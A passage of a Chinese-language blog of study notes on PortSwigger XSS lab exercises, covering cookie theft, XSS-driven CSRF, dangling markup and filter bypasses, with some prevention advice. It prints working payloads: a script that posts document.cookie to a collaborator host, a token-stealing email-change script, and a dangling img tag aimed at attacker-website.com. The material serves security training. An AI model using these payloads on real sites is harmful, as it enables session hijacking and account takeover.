<p>To enable CSP, a response needs to include an HTTP response header called <code>Content-Security-Policy</code> with a value containing the policy.<br>这里的几个lab看着都是<code>expert</code> , 不是很有做的欲望. </p>
<h1 id="Exploiting-cross-site-scripting-vulnerabilities"><a href="#Exploiting-cross-site-scripting-vulnerabilities" class="headerlink" title="Exploiting cross-site scripting vulnerabilities"></a>Exploiting <a target="_blank" rel="noopener" href="https://portswigger.net/web-security/cross-site-scripting">cross-site scripting</a> vulnerabilities</h1><h2 id="Exploiting-cross-site-scripting-to-steal-cookies"><a href="#Exploiting-cross-site-scripting-to-steal-cookies" class="headerlink" title="Exploiting cross-site scripting to steal cookies"></a>Exploiting cross-site scripting to steal cookies</h2><p>传统利用方式, 但是也有不足:</p>
<ul>
<li>The victim might not be logged in.</li>
<li>Many applications hide their cookies from JavaScript using the <code>HttpOnly</code> flag.</li>
<li>Sessions might be locked to additional factors like the user’s IP address.</li>
<li>The session might time out before you’re able to hijack it.</li>
</ul>
<h4 id="Lab-Exploiting-cross-site-scripting-to-steal-cookies"><a href="#Lab-Exploiting-cross-site-scripting-to-steal-cookies" class="headerlink" title="Lab: Exploiting cross-site scripting to steal cookies"></a>Lab: <a target="_blank" rel="noopener" href="https://portswigger.net/web-security/cross-site-scripting/exploiting">Exploiting cross-site scripting</a> to steal cookies</h4><p>这里lab描述就指出了评论中存在一个存储型XSS , 但是进入lab后没发现exploit server ,这怎么去获取其余用户的cookie?</p>
<p>ok , 下边推荐用Burp Collaborator ,知道哥们的Burp Collaborator不大行 , 还提示有别的方法, 真贴心.</p>
<p>solution给出的一种解法是: 借助Burp Collaborator 构建如下payload</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript"><span class="title function_">fetch</span>(<span class="string">&#x27;https://BURP-COLLABORATOR-SUBDOMAIN&#x27;</span>, &#123;</span></span><br><span class="line"><span class="language-javascript"><span class="attr">method</span>: <span class="string">&#x27;POST&#x27;</span>,</span></span><br><span class="line"><span class="language-javascript"><span class="attr">mode</span>: <span class="string">&#x27;no-cors&#x27;</span>,</span></span><br><span class="line"><span class="language-javascript"><span class="attr">body</span>:<span class="variable language_">document</span>.<span class="property">cookie</span></span></span><br><span class="line"><span class="language-javascript">&#125;);</span></span><br><span class="line"><span class="language-javascript"></span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>哥们怀着虔诚的心, 又跑了一遍health check, 结果没有变化(有变化就有点诡异了说实话)<img src="https://raw.githubusercontent.com/91Quin/-for-hexo/main/img/202403262143196.png"></p>
<p>做了一遍结果也是不出所料 , 一点反应没有 . 太妙了 , 我必须利用XSS漏洞来执行CSRF .</p>
<p>最挫败的一集 , 如果之后的lab都需要使用Burp Collaborator , 哥们将会成为赵括第二. </p>
<h2 id="Exploiting-cross-site-scripting-to-capture-passwords"><a href="#Exploiting-cross-site-scripting-to-capture-passwords" class="headerlink" title="Exploiting cross-site scripting to capture passwords"></a>Exploiting cross-site scripting to capture passwords</h2><p>这里提到: 利用密码管理器(坏了 ,我成目标群体了) , creating a password input, reading out the auto-filled password, and sending it to your own domain. </p>
<blockquote>
<p>这让我想到了Google之前密码管理器的漏洞 , 可以通过系统调用获取明文密码.</p>
</blockquote>
<p>这里的lab同样需要Burp Collaborator</p>
<h2 id="Exploiting-cross-site-scripting-to-perform-CSRF"><a href="#Exploiting-cross-site-scripting-to-perform-CSRF" class="headerlink" title="Exploiting cross-site scripting to perform CSRF"></a>Exploiting cross-site scripting to perform <a target="_blank" rel="noopener" href="https://portswigger.net/web-security/csrf">CSRF</a></h2><blockquote>
<p>好消息, 我想这里的lab应该不至于需要Burp Collaborator</p>
</blockquote>
<p>这里更多就是CSRF的内容了[[XSS vs CSRF]][[Cross-site request forgery(CSRF)跨站请求伪造]]</p>
<h4 id="Lab-Exploiting-XSS-to-perform-CSRF"><a href="#Lab-Exploiting-XSS-to-perform-CSRF" class="headerlink" title="Lab: Exploiting XSS to perform CSRF"></a>Lab: <a target="_blank" rel="noopener" href="https://portswigger.net/web-security/cross-site-scripting/exploiting">Exploiting XSS</a> to perform CSRF</h4><p>这里登陆后修改邮件地址, 可以看到相应的http request :</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">POST</span> <span class="string">/my-account/change-email</span> <span class="meta">HTTP/2</span></span><br><span class="line"><span class="attribute">Host</span><span class="punctuation">: </span>0a9f005303994228819d2040002d0023.web-security-academy.net</span><br><span class="line"><span class="attribute">Cookie</span><span class="punctuation">: </span>session=EAdmVpbKNfVZOJwwV3sk9CAUS93jvzvM</span><br><span class="line"><span class="attribute">Content-Length</span><span class="punctuation">: </span>53</span><br><span class="line"><span class="attribute">Cache-Control</span><span class="punctuation">: </span>max-age=0</span><br><span class="line"><span class="attribute">Sec-Ch-Ua</span><span class="punctuation">: </span>&quot;Chromium&quot;;v=&quot;122&quot;, &quot;Not(A:Brand&quot;;v=&quot;24&quot;, &quot;Google Chrome&quot;;v=&quot;122&quot;</span><br><span class="line"><span class="attribute">Sec-Ch-Ua-Mobile</span><span class="punctuation">: </span>?0</span><br><span class="line"><span class="attribute">Sec-Ch-Ua-Platform</span><span class="punctuation">: </span>&quot;Linux&quot;</span><br><span class="line"><span class="attribute">Upgrade-Insecure-Requests</span><span class="punctuation">: </span>1</span><br><span class="line"><span class="attribute">Origin</span><span class="punctuation">: </span>https://0a9f005303994228819d2040002d0023.web-security-academy.net</span><br><span class="line"><span class="attribute">Content-Type</span><span class="punctuation">: </span>application/x-www-form-urlencoded</span><br><span class="line"><span class="attribute">User-Agent</span><span class="punctuation">: </span>Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36</span><br><span class="line"><span class="attribute">Accept</span><span class="punctuation">: </span>text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7</span><br><span class="line"><span class="attribute">Sec-Fetch-Site</span><span class="punctuation">: </span>same-origin</span><br><span class="line"><span class="attribute">Sec-Fetch-Mode</span><span class="punctuation">: </span>navigate</span><br><span class="line"><span class="attribute">Sec-Fetch-User</span><span class="punctuation">: </span>?1</span><br><span class="line"><span class="attribute">Sec-Fetch-Dest</span><span class="punctuation">: </span>document</span><br><span class="line"><span class="attribute">Referer</span><span class="punctuation">: </span>https://0a9f005303994228819d2040002d0023.web-security-academy.net/my-account?id=wiener</span><br><span class="line"><span class="attribute">Accept-Encoding</span><span class="punctuation">: </span>gzip, deflate</span><br><span class="line"><span class="attribute">Accept-Language</span><span class="punctuation">: </span>zh-CN,zh;q=0.9</span><br><span class="line"></span><br><span class="line"><span class="language-gcode">email=<span class="number">1</span><span class="meta">%</span><span class="number">401.</span>com&amp;csrf=QAAYDU<span class="number">7</span>lB<span class="number">7</span>R<span class="attr">Vs1</span><span class="symbol">NOgzwVmsySQhyM1</span>f<span class="symbol">n6</span></span></span><br></pre></td></tr></table></figure>
<p>可以看到是有CSRF token的 . </p>
<p>这里我自己尝试去构建payload , 结果发现不大行, 不会JavaScript 不会HTML 没搭过网站, 就是不大行 .</p>
<p>题解中给出payload:</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript"><span class="keyword">var</span> req = <span class="keyword">new</span> <span class="title class_">XMLHttpRequest</span>();</span></span><br><span class="line"><span class="language-javascript">req.<span class="property">onload</span> = handleResponse;</span></span><br><span class="line"><span class="language-javascript">req.<span class="title function_">open</span>(<span class="string">&#x27;get&#x27;</span>,<span class="string">&#x27;/my-account&#x27;</span>,<span class="literal">true</span>);</span></span><br><span class="line"><span class="language-javascript">req.<span class="title function_">send</span>();</span></span><br><span class="line"><span class="language-javascript"><span class="keyword">function</span> <span class="title function_">handleResponse</span>(<span class="params"></span>) &#123;</span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">var</span> token = <span class="variable language_">this</span>.<span class="property">responseText</span>.<span class="title function_">match</span>(<span class="regexp">/name=&quot;csrf&quot; value=&quot;(\w+)&quot;/</span>)[<span class="number">1</span>];</span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">var</span> changeReq = <span class="keyword">new</span> <span class="title class_">XMLHttpRequest</span>();</span></span><br><span class="line"><span class="language-javascript">    changeReq.<span class="title function_">open</span>(<span class="string">&#x27;post&#x27;</span>, <span class="string">&#x27;/my-account/change-email&#x27;</span>, <span class="literal">true</span>);</span></span><br><span class="line"><span class="language-javascript">    changeReq.<span class="title function_">send</span>(<span class="string">&#x27;csrf=&#x27;</span>+token+<span class="string">&#x27;&amp;email=test@test.com&#x27;</span>)</span></span><br><span class="line"><span class="language-javascript">&#125;;</span></span><br><span class="line"><span class="language-javascript"></span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></table></figure>
<h2 id="Dangling-markup-injection"><a href="#Dangling-markup-injection" class="headerlink" title="Dangling markup injection"></a>Dangling markup injection</h2><p>Dangling markup injection is a technique that can be used to capture data cross-domain in situations where a full cross-site scripting exploit is not possible</p>
<h1 id="Dangling-markup-injection-1"><a href="#Dangling-markup-injection-1" class="headerlink" title="Dangling markup injection"></a>Dangling markup injection</h1><h2 id="What-is-dangling-markup-injection"><a href="#What-is-dangling-markup-injection" class="headerlink" title="What is dangling markup injection?"></a>What is dangling markup injection?</h2><p>说到底还是由于完全的XSS不行 , 退而求其次 .</p>
<p>Suppose an application embeds attacker-controllable data into its responses in an unsafe way:</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;input type=&quot;text&quot; name=&quot;input&quot; value=&quot;CONTROLLABLE DATA HERE</span><br></pre></td></tr></table></figure>
<p>并且假定应用不会过滤或是escape the <code>&gt;</code> or <code>&quot;</code> characters.</p>
<p>攻击者就可以使用<code>&quot;&gt;</code>来闭合属性值 , 但是由于完全的XSS不可行, 所以去deliver a dangling markup injection attack using a payload like the following:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot;&gt;&lt;img src=&#x27;//attacker-website.com?</span><br></pre></td></tr></table></figure>
<p>注意:the attacker’s payload doesn’t close the <code>src</code> attribute, which is left “dangling”.</p>
<p>我的理解是他这个<code>src</code>属性没闭合 ,所以在闭合之前 ,会有敏感数据作为URL query被送去攻击者的网址. 所以是”dangling” , 因为没闭合 , 所以咣当着.</p>
<p>The consequence of the attack is that the attacker can capture part of the application’s response following the injection point, which might contain sensitive data.</p>
<h2 id="How-to-prevent-XSS-attacks"><a href="#How-to-prevent-XSS-attacks" class="headerlink" title="How to prevent XSS attacks"></a>How to prevent XSS attacks</h2><p>总的来说 , 有如下措施:</p>
<ul>
<li><strong>Filter input on arrival.</strong></li>
<li><strong>Encode data on output.</strong></li>
<li><strong>Use appropriate response headers.</strong> you can use the <code>Content-Type</code> and <code>X-Content-Type-Options</code> headers to ensure that browsers interpret the responses in the way you intend.<blockquote>
<p>我想到了文件上传那里的MIME</p>
</blockquote>
</li>
<li><strong>Content Security Policy</strong></li>
</ul>
<h2 id="Common-questions-about-cross-site-scripting"><a href="#Common-questions-about-cross-site-scripting" class="headerlink" title="Common questions about cross-site scripting"></a>Common questions about cross-site scripting</h2><ul>
<li><strong>How common are XSS vulnerabilities?</strong></li>
<li><strong>How common are XSS attacks?</strong></li>
<li><strong>What is the difference between XSS and CSRF?</strong></li>
<li><strong>What is the difference between XSS and SQL injection?</strong><blockquote>
<p>一个是cilent-side, 目标是用户 ; 一个是 server-side , 目标是后端的数据库</p>
</blockquote>
</li>
<li><strong>How do I prevent XSS in PHP?</strong><blockquote>
<p>Filter your inputs with a whitelist of allowed characters and use type hints or type casting. Escape your outputs with <code>htmlentities</code> and <code>ENT_QUOTES</code> for HTML contexts, or JavaScript Unicode escapes for JavaScript contexts.</p>
</blockquote>
</li>
<li><strong>How do I prevent XSS in Java?</strong><blockquote>
<p>Filter your inputs with a whitelist of allowed characters and use a library such as Google Guava to HTML-encode your output for HTML contexts, or use JavaScript Unicode escapes for JavaScript contexts.</p>
</blockquote>
</li>
</ul>
<h1 id="Cross-site-scripting-contexts"><a href="#Cross-site-scripting-contexts" class="headerlink" title="Cross-site scripting contexts"></a><a target="_blank" rel="noopener" href="https://portswigger.net/web-security/cross-site-scripting">Cross-site scripting</a> contexts</h1><p>When testing for <a target="_blank" rel="noopener" href="https://portswigger.net/web-security/cross-site-scripting/reflected">reflected</a> and <a target="_blank" rel="noopener" href="https://portswigger.net/web-security/cross-site-scripting/stored">stored</a> XSS, a key task is to identify the XSS context</p>
<ul>
<li>The location within the response where attacker-controllable data appears.</li>
<li>Any input validation or other processing that is being performed on that data by the application.<br>因为这些因素决定了应当构造怎样的payload.</li>
</ul>
<h2 id="XSS-between-HTML-tags"><a href="#XSS-between-HTML-tags" class="headerlink" title="XSS between HTML tags"></a>XSS between HTML tags</h2><p> introduce some new HTML tags designed to trigger execution of JavaScript.</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"><span class="title function_">alert</span>(<span class="variable language_">document</span>.<span class="property">domain</span>)</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">img</span> <span class="attr">src</span>=<span class="string">1</span> <span class="attr">onerror</span>=<span class="string">alert(1)</span>&gt;</span></span><br></pre></td></tr></table></figure>
<h4 id="Lab-Reflected-XSS-into-HTML-context-with-most-tags-and-attributes-blocked"><a href="#Lab-Reflected-XSS-into-HTML-context-with-most-tags-and-attributes-blocked" class="headerlink" title="Lab: Reflected XSS into HTML context with most tags and attributes blocked"></a>Lab: <a target="_blank" rel="noopener" href="https://portswigger.net/web-security/cross-site-scripting/reflected">Reflected XSS</a> into HTML context with most tags and attributes blocked</h4><p> 这里题目描述中指出 , 页面使用了web application firewall (WAF) , 但是可以使用<code>print()</code>  . </p>
<p>我尝试构造了payload</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;print(document.domain)&lt;/script&gt;</span><br></pre></td></tr></table></figure>
<p>结果并不行. 看到solution也是先尝试Inject a standard XSS vector</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">img</span> <span class="attr">src</span>=<span class="string">1</span> <span class="attr">onerror</span>=<span class="string">print()</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>观察到没有执行(get blocked). solution是使用Burp Intruder来测试哪些tags 和属性 可以 .</p>
<ol>
<li>测试搜索功能 , 将相应request发到Intruder . 在search参数上添加变量<br><img src="https://raw.githubusercontent.com/91Quin/-for-hexo/main/img/202403270935328.png"></li>
<li>然后利用 <a target="_blank" rel="noopener" href="https://portswigger.net/web-security/cross-site-scripting/cheat-sheet">XSS cheat sheet</a> ,复制tags , 粘贴到intruder里 ,<br><img src="https://raw.githubusercontent.com/91Quin/-for-hexo/main/img/202403270938229.png"></li>
<li>然后让它跑 , 跑出来看到只有<code>body</code>和<code>custom tag</code>可以跑通<br><img src="https://raw.githubusercontent.com/91Quin/-for-hexo/main/img/202403271057194.png"></li>
<li>然后再构建search的参数<code>&lt;body%20=1&gt;</code> ,放到intruder里, 再去<a target="_blank" rel="noopener" href="https://portswigger.net/web-security/cross-site-scripting/cheat-sheet">XSS cheat sheet</a> and click “copy events to clipboard”.<br><img src="https://raw.githubusercontent.com/91Quin/-for-hexo/main/img/202403271102460.png"></li>
<li>然后让它跑 , 爬出来发现有一些payload是可以的.<br><img src="https://raw.githubusercontent.com/91Quin/-for-hexo/main/img/202403271224449.png"></li>
<li>使用<code>onresize</code>去构建payload:<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">iframe</span> <span class="attr">src</span>=<span class="string">&quot;https://0a2b00c903b6b0c880dc803100030051.web-security-academy.net/?search=%22%3E%3Cbody%20onresize=print()%3E&quot;</span> <span class="attr">onload</span>=<span class="string">this.style.width</span>=<span class="string">&#x27;100px&#x27;</span>&gt;</span></span><br></pre></td></tr></table></figure>
即可solve</li>
</ol>
<h4 id="Lab-Reflected-XSS-into-HTML-context-with-all-tags-blocked-except-custom-ones"><a href="#Lab-Reflected-XSS-into-HTML-context-with-all-tags-blocked-except-custom-ones" class="headerlink" title="Lab: Reflected XSS into HTML context with all tags blocked except custom ones"></a>Lab: <a target="_blank" rel="noopener" href="https://portswigger.net/web-security/cross-site-scripting/reflected">Reflected XSS</a> into HTML context with all tags blocked except custom ones</h4><p>这个lab与上个lab就不同, 需要使用<code>custom tag</code> . 我这也没接触过<code>custom tag</code> .</p>
<p>看了solution , 题解中使用一个a custom tag with the ID <code>x</code>, which contains an <code>onfocus</code> event handler that triggers the <code>alert</code> function.</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">location = <span class="string">&#x27;https://YOUR-LAB-ID.web-security-academy.net/?search=%3Cxss+id%3Dx+onfocus%3Dalert%28document.cookie%29%20tabindex=1%3E#x&#x27;</span>;</span></span><br><span class="line"><span class="language-javascript"></span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>以上decode之后是这样的:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">location = &#x27;https://YOUR-LAB-ID.web-security-academy.net/?search=&lt;xss id=x onfocus=alert(document.cookie) tabindex=1&gt;#x&#x27;;</span><br></pre></td></tr></table></figure>
<p>这里末尾的这个没明白怎么回事? 而且这里由于我手贱 , payload 推送出去了 , lab solved  ,只能是过段时间再来做改一下这个payload 来试试看了.</p>
<h4 id="Lab-Reflected-XSS-with-some-SVG-markup-allowed"><a href="#Lab-Reflected-XSS-with-some-SVG-markup-allowed" class="headerlink" title="Lab: Reflected XSS with some SVG markup allowed"></a>Lab: <a target="_blank" rel="noopener" href="https://portswigger.net/web-security/cross-site-scripting/reflected">Reflected XSS</a> with some SVG markup allowed</h4><p>这里lab描述中指出: The site is blocking common tags but misses some SVG tags and events.</p>
<p>这里看了solution , 发现他还是用burp intruder去添加参数扫的.<br>扫出来看到<code>&lt;svg&gt;</code>, <code>&lt;animatetransform&gt;</code>, <code>&lt;title&gt;</code>, and <code>&lt;image&gt;</code> tags都是可以的,然后就是进一步构造payload , 然后再去扫events , 扫出来<code>onbegin</code>是可以的. 最终构建payload:<br><code>https://0a65002104e51cc48011bc2300d4009f.h1-web-security-academy.net/?search=%22%3E%3Csvg%3E%3Canimatetransform%20onbegin=alert(1)%3E</code></p>
<h2 id="XSS-in-HTML-tag-attributes"><a href="#XSS-in-HTML-tag-attributes" class="headerlink" title="XSS in HTML tag attributes"></a>XSS in HTML tag attributes</h2><p>这里的中心思想就是，terminate the attribute value, close the tag, and introduce a new one</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot;&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;</span><br></pre></td></tr></table></figure>
<p>更多情况下,尖括号are blocked or encoded.所以can normally introduce a new attribute that creates a scriptable context, such as an event handler.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot; autofocus onfocus=alert(document.domain) x=&quot;</span><br></pre></td></tr></table></figure>
<p>payload creates an <code>onfocus</code> event that will execute JavaScript when the element receives the focus, and also adds the <code>autofocus</code> attribute to try to trigger the <code>onfocus</code> event automatically without any user interaction. Finally, it adds <code>x=&quot;</code> to gracefully repair the following markup.</p>
<h4 id="Lab-Reflected-XSS-into-attribute-with-angle-brackets-HTML-encoded"><a href="#Lab-Reflected-XSS-into-attribute-with-angle-brackets-HTML-encoded" class="headerlink" title="Lab: Reflected XSS into attribute with angle brackets HTML-encoded"></a>Lab: <a target="_blank" rel="noopener" href="https://portswigger.net/web-security/cross-site-scripting/reflected">Reflected XSS</a> into attribute with angle brackets HTML-encoded</h4><p>这里就是使用闭合括号了,用repeater测试后发现response中有:</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">section</span> <span class="attr">class</span>=<span class="string">blog-header</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">h1</span>&gt;</span>0 search results for &#x27;meifabi&#x27;<span class="tag">&lt;/<span class="name">h1</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">hr</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">section</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">section</span> <span class="attr">class</span>=<span class="string">search</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">form</span> <span class="attr">action</span>=<span class="string">/</span> <span class="attr">method</span>=<span class="string">GET</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">text</span> <span class="attr">placeholder</span>=<span class="string">&#x27;Search the blog...&#x27;</span> <span class="attr">name</span>=<span class="string">search</span> <span class="attr">value</span>=<span class="string">&quot;meifabi&quot;</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">button</span> <span class="attr">type</span>=<span class="string">submit</span> <span class="attr">class</span>=<span class="string">button</span>&gt;</span>Search<span class="tag">&lt;/<span class="name">button</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">form</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">section</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>尝试去构造payload:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot;onmouseover=&quot;alert(1)</span><br></pre></td></tr></table></figure>
<p>最终response</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">text</span> <span class="attr">placeholder</span>=<span class="string">&#x27;Search the blog...&#x27;</span> <span class="attr">name</span>=<span class="string">search</span> <span class="attr">value</span>=<span class="string">&quot;&quot;</span><span class="attr">onmouseover</span>=<span class="string">&quot;alert(1)&quot;</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">button</span> <span class="attr">type</span>=<span class="string">submit</span> <span class="attr">class</span>=<span class="string">button</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p> you can execute JavaScript without needing to terminate the attribute value.<br> <br>if the XSS context is into the <code>href</code> attribute of an anchor tag, you can use the <code>javascript</code> pseudo-protocol to execute script.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;a href=&quot;javascript:alert(document.domain)&quot;&gt;</span><br></pre></td></tr></table></figure>
<h4 id="Lab-Stored-XSS-into-anchor-href-attribute-with-double-quotes-HTML-encoded"><a href="#Lab-Stored-XSS-into-anchor-href-attribute-with-double-quotes-HTML-encoded" class="headerlink" title="Lab: Stored XSS into anchor href attribute with double quotes HTML-encoded"></a>Lab: <a target="_blank" rel="noopener" href="https://portswigger.net/web-security/cross-site-scripting/stored">Stored XSS</a> into anchor <code>href</code> attribute with double quotes HTML-encoded</h4><p>payload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">csrf=6AhHoIYjpaAbxYrerfaKUYD1JHOK9dTf&amp;postId=6&amp;comment=test&amp;name=1&amp;email=1%401.com&amp;website=javascript:alert(1)</span><br></pre></td></tr></table></figure>
    </div>

    
    
    

      <footer class="post-footer">
          
          <div class="post-tags">
              <a href="/tags/%E7%9F%A5%E8%AF%86-cybersecurity/" rel="tag"><i class="fa fa-tag"></i> 知识/cybersecurity</a>
              <a href="/tags/Web/" rel="tag"><i class="fa fa-tag"></i> Web</a>
              <a href="/tags/XSS/" rel="tag"><i class="fa fa-tag"></i> XSS</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/Notes/Web%20cache%20poisoning/" rel="prev" title="Web cache poisoning">
      <i class="fa fa-chevron-left"></i> Web cache poisoning
    </a></div>
      <div class="post-nav-item">
    <a href="/Notes/%E6%B2%BC%E6%B3%BD%E8%BF%87%E6%BB%A4/" rel="next" title="沼泽过滤">
      沼泽过滤 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#Cross-site-scripting"><span class="nav-number">1.</span> <span class="nav-text">Cross-site scripting</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#What-is-cross-site-scripting-XSS"><span class="nav-number">1.1.</span> <span class="nav-text">What is cross-site scripting (XSS)?</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#How-does-XSS-work"><span class="nav-number">1.2.</span> <span class="nav-text">How does XSS work?</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#XSS-proof-of-concept"><span class="nav-number">1.3.</span> <span class="nav-text">XSS proof of concept</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#What-are-the-types-of-XSS-attacks"><span class="nav-number">1.4.</span> <span class="nav-text">What are the types of XSS attacks?</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Reflected-cross-site-scripting"><span class="nav-number">1.5.</span> <span class="nav-text">Reflected cross-site scripting</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Reflected-XSS"><span class="nav-number">2.</span> <span class="nav-text">Reflected XSS</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#What-is-reflected-cross-site-scripting"><span class="nav-number">2.1.</span> <span class="nav-text">What is reflected cross-site scripting?</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Impact-of-reflected-XSS-attacks"><span class="nav-number">2.2.</span> <span class="nav-text">Impact of reflected XSS attacks</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Reflected-XSS-in-different-contexts"><span class="nav-number">2.3.</span> <span class="nav-text">Reflected XSS in different contexts</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#How-to-find-and-test-for-reflected-XSS-vulnerabilities"><span class="nav-number">2.4.</span> <span class="nav-text">How to find and test for reflected XSS vulnerabilities</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Common-questions-about-reflected-cross-site-scripting"><span class="nav-number">2.5.</span> <span class="nav-text">Common questions about reflected cross-site scripting</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Stored-cross-site-scripting"><span class="nav-number">2.6.</span> 